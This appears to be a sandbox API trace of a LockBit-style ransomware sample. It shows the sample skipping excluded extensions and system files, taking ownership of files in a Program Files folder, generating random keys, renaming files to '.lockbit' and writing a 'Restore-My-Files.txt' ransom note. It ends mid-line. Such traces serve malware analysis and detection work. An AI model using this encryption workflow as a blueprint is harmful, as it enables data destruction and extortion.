[0092.529] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0092.529] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0092.529] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0092.529] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0092.529] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0092.529] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0092.529] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0092.529] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0092.529] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0092.529] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0092.529] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0092.529] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0092.530] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0092.530] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0092.530] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0092.530] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0092.530] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0092.530] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0092.530] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0092.530] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.530] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0092.530] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0092.530] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0092.530] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0092.530] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0092.530] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0092.530] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0092.531] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0092.531] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0092.531] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0092.531] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0092.531] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0092.531] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0092.531] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0092.531] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0092.531] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0092.531] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0092.531] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.531] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0092.531] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0092.531] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0092.531] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0092.531] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="16_9-frame-image-inset.png") returned 1 [0092.531] lstrcmpiW (lpString1="ntldr", lpString2="16_9-frame-image-inset.png") returned 1 [0092.531] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="16_9-frame-image-inset.png") returned 1 [0092.531] lstrcmpiW (lpString1="bootsect.bak", lpString2="16_9-frame-image-inset.png") returned 1 [0092.531] lstrcmpiW (lpString1="autorun.inf", lpString2="16_9-frame-image-inset.png") returned 1 [0092.531] lstrcmpiW (lpString1="thumbs.db", lpString2="16_9-frame-image-inset.png") returned 1 [0092.532] lstrcmpiW (lpString1="iconcache.db", lpString2="16_9-frame-image-inset.png") returned 1 [0092.532] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\") returned="" [0092.532] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png") returned=".png" [0092.532] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0092.532] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0092.532] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0092.532] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0092.532] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0092.532] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0092.532] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0092.532] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0092.532] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0092.532] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0092.532] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0092.532] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0092.532] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0092.532] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0092.532] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0092.532] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0092.532] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0092.532] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0092.532] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0092.533] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0092.533] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0092.533] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0092.533] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0092.533] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0092.533] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0092.533] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0092.533] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0092.533] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0092.533] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png.lockbit") returned 86 [0092.533] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\16_9-frame-image-inset.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.535] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0092.537] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0092.537] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0092.538] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0092.540] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0092.540] RtlFreeAnsiString (AnsiString="\\") [0092.540] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x1194) returned 0x0 [0092.540] malloc (_Size=0x200) returned 0x77d800 [0092.540] NtQueryInformationToken (in: TokenHandle=0x1194, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0092.541] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.541] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.541] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.541] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.542] CloseHandle (hObject=0x1194) returned 1 [0092.542] free (_Block=0x77d800) [0092.542] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\16_9-frame-image-inset.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x1194 [0092.542] CreateIoCompletionPort (FileHandle=0x1194, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0092.542] malloc (_Size=0x40068) returned 0x3d70048 [0092.542] GetFileSizeEx (in: hFile=0x1194, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=3159) returned 1 [0092.542] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.546] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0092.546] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.550] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0092.550] ReadFile (in: hFile=0x1194, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0092.563] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0092.563] malloc (_Size=0xc2) returned 0x77d800 [0092.563] NtSetInformationFile (FileHandle=0x1194, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0092.563] free (_Block=0x77d800) [0092.564] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-image-inset.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 1 [0092.564] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt") returned 72 [0092.564] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.564] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7268fbb9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7268fbb9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553e929b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x213d, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn-back-static.png", cAlternateFileName="")) returned 1 [0092.564] lstrcmpiW (lpString1=".", lpString2="btn-back-static.png") returned -1 [0092.564] lstrcmpiW (lpString1="..", lpString2="btn-back-static.png") returned -1 [0092.564] PathFindExtensionW (pszPath="btn-back-static.png") returned=".png" [0092.564] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0092.564] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0092.564] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0092.564] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0092.564] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0092.564] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0092.564] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0092.564] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0092.564] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0092.564] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0092.565] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0092.565] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0092.565] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0092.565] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0092.565] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0092.565] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0092.565] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0092.565] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0092.565] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0092.565] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0092.565] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0092.565] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0092.565] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0092.565] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0092.565] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.565] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0092.565] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0092.565] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0092.565] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0092.565] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0092.566] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0092.566] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0092.566] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0092.566] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0092.566] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0092.566] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0092.566] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0092.566] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0092.566] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0092.566] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0092.566] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0092.566] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0092.566] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.566] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0092.566] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0092.566] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0092.566] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0092.566] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="btn-back-static.png") returned 1 [0092.566] lstrcmpiW (lpString1="ntldr", lpString2="btn-back-static.png") returned 1 [0092.566] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="btn-back-static.png") returned 1 [0092.566] lstrcmpiW (lpString1="bootsect.bak", lpString2="btn-back-static.png") returned -1 [0092.566] lstrcmpiW (lpString1="autorun.inf", lpString2="btn-back-static.png") returned -1 [0092.567] lstrcmpiW (lpString1="thumbs.db", lpString2="btn-back-static.png") returned 1 [0092.567] lstrcmpiW (lpString1="iconcache.db", lpString2="btn-back-static.png") returned 1 [0092.567] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\") returned="" [0092.567] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png") returned=".png" [0092.567] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0092.567] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0092.567] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0092.567] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0092.567] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0092.567] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0092.567] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0092.567] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0092.567] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0092.567] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0092.567] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0092.567] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0092.567] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0092.567] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0092.567] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0092.567] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0092.567] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0092.568] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0092.568] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0092.568] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0092.568] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0092.568] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0092.568] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0092.568] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0092.568] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0092.568] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0092.568] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0092.568] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0092.568] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png.lockbit") returned 79 [0092.568] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\btn-back-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.570] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0092.571] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0092.572] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0092.573] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0092.574] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0092.574] RtlFreeAnsiString (AnsiString="\\") [0092.574] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x11a0) returned 0x0 [0092.574] malloc (_Size=0x200) returned 0x77d800 [0092.574] NtQueryInformationToken (in: TokenHandle=0x11a0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0092.574] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.574] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0092.574] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.575] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0092.575] CloseHandle (hObject=0x11a0) returned 1 [0092.576] free (_Block=0x77d800) [0092.576] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\btn-back-static.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x11a0 [0092.576] CreateIoCompletionPort (FileHandle=0x11a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0092.576] malloc (_Size=0x40068) returned 0x3db00b8 [0092.578] GetFileSizeEx (in: hFile=0x11a0, lpFileSize=0x3db00d0 | out: lpFileSize=0x3db00d0*=8509) returned 1 [0092.578] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.582] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.582] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00ec) returned 0x0 [0092.582] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0092.584] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0092.584] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00fc) returned 0x0 [0092.584] ReadFile (in: hFile=0x11a0, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0092.594] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0092.594] malloc (_Size=0xb4) returned 0x77d800 [0092.594] NtSetInformationFile (FileHandle=0x11a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0092.595] free (_Block=0x77d800) [0092.595] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\btn-back-static.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 1 [0092.595] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt") returned 72 [0092.595] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0092.595] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7268fbb9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7268fbb9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553e929b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1fb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn-next-static.png", cAlternateFileName="")) returned 1 [0092.595] lstrcmpiW (lpString1=".", lpString2="btn-next-static.png") returned -1 [0092.595] lstrcmpiW (lpString1="..", lpString2="btn-next-static.png") returned -1 [0092.595] PathFindExtensionW (pszPath="btn-next-static.png") returned=".png" [0092.595] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0092.595] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0092.595] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0092.595] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0092.595] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0092.596] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0092.596] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0092.596] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0092.596] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0092.596] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0092.596] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0092.596] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0092.596] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0092.596] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0092.596] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0092.596] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0092.596] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0092.596] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0092.596] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0092.597] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0092.597] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0092.597] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0092.597] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0092.597] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0092.597] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0092.597] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0092.597] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0092.597] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0092.597] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0092.597] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0092.597] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0092.597] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0092.597] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0092.597] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0092.597] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0092.597] lstrcmpiW (lpString1=".key", 